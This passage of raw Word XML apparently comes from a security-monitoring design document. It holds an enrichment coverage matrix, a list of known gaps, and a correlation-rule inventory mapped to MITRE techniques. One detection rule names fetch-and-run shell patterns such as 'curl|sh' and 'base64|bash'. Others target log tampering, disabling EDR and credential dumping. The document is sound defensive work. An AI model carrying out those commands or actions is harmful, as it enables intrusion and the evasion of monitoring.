            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dst_ip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F0DB373" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>asn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">_*_number, org, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>network_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>is_hosting</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>is_tor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>is_vpn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BAA1379" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>MaxMind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> GeoLite2-ASN.mmdb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6B9FAD8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>LRU 10K</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="70AA6B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2B70206" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ThreatIntel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1D57A8C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>src_ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dst_ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, domain, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_hash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5CB0294" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>threat_intel_match</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>threat_source</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>threat_severity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82EF10A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SQLite (local)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BE1CE0C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>LRU 10K, TTL 3600s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54F5FE85" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C3221EF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Key: Never overwrites raw values. Only ADDS new fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4CC410" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E0A656A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Enrichment Coverage Matrix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8"/>
        <w:gridCol w:w="1416"/>
        <w:gridCol w:w="2393"/>
        <w:gridCol w:w="932"/>
        <w:gridCol w:w="2869"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA1094" w14:paraId="292C66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4FE177E9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Attribute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17C20EC6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Enrichable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>?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0ABD6F57" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Currently Enriched?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206512EE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Tested?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60940262" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="5342B5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759DBB8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Network IPs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D4EDADD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000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52F32E5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>GeoIP</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> + ASN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EC0302A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000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E04A535" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="71FD59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14B00FF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Domains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57208AE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000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2C3F771" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ThreatIntel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2F88A09" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000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3D448E5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>typosquatting</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="5FA692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F6F9FAF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>File Hashes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84DB419" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000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802ED68" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ThreatIntel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35AB62E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000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A0BBEE0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SHA256 only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="637FB4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44003E2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URLs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6E1A20E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000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912F2B0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>NOT enriched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6F530A9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w: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758C4B9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>GAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="7BFF9D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535495D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>User Context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84C48A1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w: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18B2C26" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>NOT enriched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329513F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w: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31EB481" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>GAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="678D48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84122D5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Process Paths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5E1F2DD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w: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82EC594" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>NOT enriched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55E8892" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w: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6AA1FA8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>GAP (binary reputation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="64894D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235433D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Ports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0613947" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w: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CDF2285" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>NOT enriched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73C3E54" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w: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D2FF9A6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>GAP (service mapping)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="025D5C84" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52B2EC4C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>4.4 Critical Gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3520103B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G10: URLs not enriched (no URL threat intel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1B7224" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G11: User context not enriched (no baseline/anomaly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F68639" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G12: Binary reputation not checked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01882CED" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">G13: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MaxMind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> DB staleness (monthly updates, zero-days in between)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60302915" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32A4F22F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094"/>
    <w:p w14:paraId="7CEBB50F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 5 — CORRELATION ENGINE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798E054B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Rule Inventory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1"/>
        <w:gridCol w:w="1485"/>
        <w:gridCol w:w="2045"/>
        <w:gridCol w:w="813"/>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="2302"/>
        <w:gridCol w:w="642"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA1094" w14:paraId="509929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586E1065" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>#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1177E02A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Rule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3EDF6D32" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Trigger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1C6CEB03" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Time Window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19808F62" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>MITRE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74096C67" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Input Events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2890A866" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Tested?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="646BBC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EECE66B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000"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15054FE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SSH Brute Force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1D937A5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>≥3 failed SSH + success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5385E3B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>30min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E83BFA1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1110, T1021.004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F5B6BE8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SECURITY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147A401" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="7AD776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4375A8C" w14:textId="77777777" w:rsidR="00FA1094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A995E50" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Persistence After Auth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8C3F868" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Auth success → persistence created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11D8359" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>10min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444D7CF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1543.001/004, T1053.003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017D806" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SECURITY+AUDIT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DC71E05" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="6FB07E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6E4B1BE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000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E838556" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Suspicious Sudo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69F20BE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Dangerous </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> pattern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1B7CD19" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Single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3441B23" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1548.003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6D1EC80" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SECURITY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E6ABBB9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="546050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0E45EC1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w: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41401FB" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Multi-Tactic Attack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E9CDB4A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Flow + Process + Persistence cluster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2958F4E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>15min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EA7930E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1071, T1059, T1543.001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DC15342" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>FLOW+PROCESS+AUDIT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CA3D648" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="36719C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E044330" w14:textId="77777777" w:rsidR="00FA1094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4923458" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SSH Lateral Movement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7EEFEBF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Inbound SSH → outbound SSH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6AF92A4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>5min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89992B1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1021.004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69D668B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SECURITY+FLOW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F73BEF6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="26B62F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F896492" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w: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4E41061" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Data Exfiltration Spike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C551CD4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>&gt;10MB outbound to single IP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83F9E59" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>5min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BAA920C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1041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9B1CEC5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>FLOW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5563183" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="7007E9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63CC137" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w: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3CD3C16" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Suspicious Process Tree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387016C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Shell spawns from /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> or ~/Downloads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D4E2F26" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>60s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B73B75E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1059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14E8703" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>PROCESS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C9E4D4A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="32EE2B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A959043" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w: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6CC6688" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>APT Initial Access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A86438C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Auth + ≥3 discovery commands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BDA5164" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>10min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17122A6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1021.004, T1033, T1082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C4B126B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SECURITY+PROCESS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70E8416" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="5FABD6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6083387" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>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3ADB44F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Fileless Attack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9EB14B1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>curl|sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wget|perl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, base64|bash patterns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A85838C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Single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F146302" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1059, T1027, T1105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C2712B4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>PROCESS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205481A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="2AC1A4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E53AA08" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>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AAECC92" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Log Tampering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EEAEACF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Log deletion/truncation commands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53EE503" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Single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8E46773" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1070.002/003/006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D618BEE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>PROCESS+AUDIT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2420B8B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="15D085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1CD7D4D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>11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34CEA69" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Security Tool Disable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8C98626" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Kill EDR, disable firewall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62C4F00" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Single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CDF7BC2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1562.001/004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49B8344" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>PROCESS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D078D9D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="7C9947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BA0FB17" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>12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9CDA560" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Credential Dumping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14E5607" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>≥2 cred access signals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5471194" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>5min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27A15BD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1555, T1552.001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0A0A543" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>PROCESS+AUDIT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DF0DE9E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="134F45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F4BE216" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>13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D2D38F0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SSH Key Theft &amp; Pivot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AEE2BF4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Read SSH key → outbound SSH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E18DE2B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>10min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B10101B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1552.004, T1021.004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246B8A5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>AUDIT+FLOW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E266DCE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="4EA646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336FFF3" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>14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0060BFB" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Internal Reconnaissance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3067BF2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>10+ ports/hosts scanned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ACDABA2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Single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F3E52F3" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>T1046, T1018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500F9BC" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>FLOW+PROCESS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17989C0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
